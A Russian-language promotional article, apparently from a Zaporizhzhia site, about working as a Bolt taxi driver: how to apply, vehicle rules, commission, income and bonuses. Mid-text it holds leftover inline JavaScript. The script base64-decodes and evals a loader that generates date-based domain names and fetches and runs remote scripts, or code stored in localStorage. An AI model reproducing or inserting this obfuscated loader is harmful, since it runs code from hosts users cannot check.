Преимущества работы в Bolt в Запорожье

«Болт» — крупная международная компания, специализирующаяся на пассажирских перевозках. Ее партнерам гарантированы разные преференции, в числе которых скидка 7% на топливо и льготные условия обслуживания на автосервисе. Комиссия сервиса минимальна и составляет 12%.

Как присоединиться к успешной команде

Для того, чтобы устроиться в Bolt в Запорожье, оформить заявку на сайте https://bolt-ua.com/zaporozhye. К ней требуется приложить скан-копии техпаспорта на машину, прав (категории «B») и полис ОСАГО. Следующий этап — личное собеседование в офисе компании. Если соискатель прошел отбор, то его направляют на экспресс-обучение, в процессе которого он должен усвоить стандарты обслуживания пассажиров. После его завершения партнера подключают к работе, и он может принимать первый заказ.

Соискатель должен иметь транспортное средство. Можно также арендовать авто, главное, чтобы оно соответствовало требованиям сервиса. «Возраст» автомобиля ограничен, работать можно на машинах, выпущенных после 2003 року. Относительно типа кузов нет никаких оговорок. К работе допускаются седаны, универсалы и хетчбэки.

Особенности сотрудничества

Работа в «Bolt» в Запорожье имеет немало плюсов. Водитель самостоятельно устанавливает удобный график работы и приемлемый уровень нагрузки. Ему нет необходимости выходить на линию к определенному часу, и заканчивать работу по «звонку». Партнеры сервиса могут обслуживать пассажиров в удобное время: днем, вечером или ночью. Это дает возможность совмещать работу в такси с другими видами деятельности или обучением в ВУЗе.

Сотрудничество с сервисом гарантирует стабильный доход. «Болт» — популярный оператор такси, поэтому его партнеры не испытывают недостатка в клиентах. Несколько часов работы обеспечивает доход, которые другие таксисты получают за полную смену. Кроме того, тарифы компании на 8% выше, чем расценки конкурирующих фирм. Это обеспечивает партнерам сервиса увеличенный доход по сравнению с коллегами.

Комиссия сервиса составляет 12% от суммы заказа, что гораздо меньше процента, установленного другими операторами. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Грамотная система организация работы сводит к минимуму риск простоев:

эффективное распределение заявок. Заказ получает водитель, которые ближе других находится возле клиента. Поэтому ему не нужно тратить много времени и топлива на прибытие к месту посадки. Плюс пассажир доволен быстрой подачей авто;неустойка за ожидание. Если таксисту приходится ждать выхода заказчика более трех минут, то начиная с четвертой клиенту начисляется штраф за простой;дополнительная защита. Финансовые санкции применяются к заказчикам, которые отозвали заявку спустя некоторое время после подачи автомобиля. Эти средства перечисляются водителю как компенсация за «холостой пробег».

Для решения рабочих вопросов создана служба поддержки. Ее сотрудники всегда на связи, что гарантирует оперативное рассмотрение поступающих запросов.

Финансовая сторона

Доход водителей «Болт», работающих полный день, начинается от 21 тысячи гривен. И это далеко не предел, существует несколько возможностей увеличения заработка:

пиковые коэффициенты. Повышенные расценки применяются, если таксисту приходится работать в час пик или плохую погоду. Кроме того, пиковый коэффициент применяется, если водитель вынужден ехать к заказчику в загруженный транспортом район;бонусная система. Если партнер за месяц выполняет определенное количество поездок или обслуживает пассажиров в разных районах города, то ему гарантирована премия;пассивный доход. Автолюбители, использующие свое авто для популяризации бренда, ежемесячно получают неплохую добавку к зарплате. Суть брендирования заключается в оклеивании машины рекламными наклейками и использовании баннера;чаевые. Если таксист добросовестно относится к своим обязанностям, то довольные клиенты вручают ему определенную сумму сверх положенной оплаты. С чаевых не взимается комиссия сервиса.

Клиенты вправе рассчитываться за поездку как наличными, так и переводом. В первом случае деньги остаются у таксиста. Во втором — сума заработка, за минусом комиссионных, перечисляется на карточку. Зарплата выплачивается раз в неделю без задержек и дополнительных напоминаний. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/preimushhestva-raboty-v-bolt-v-zaporozhe/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top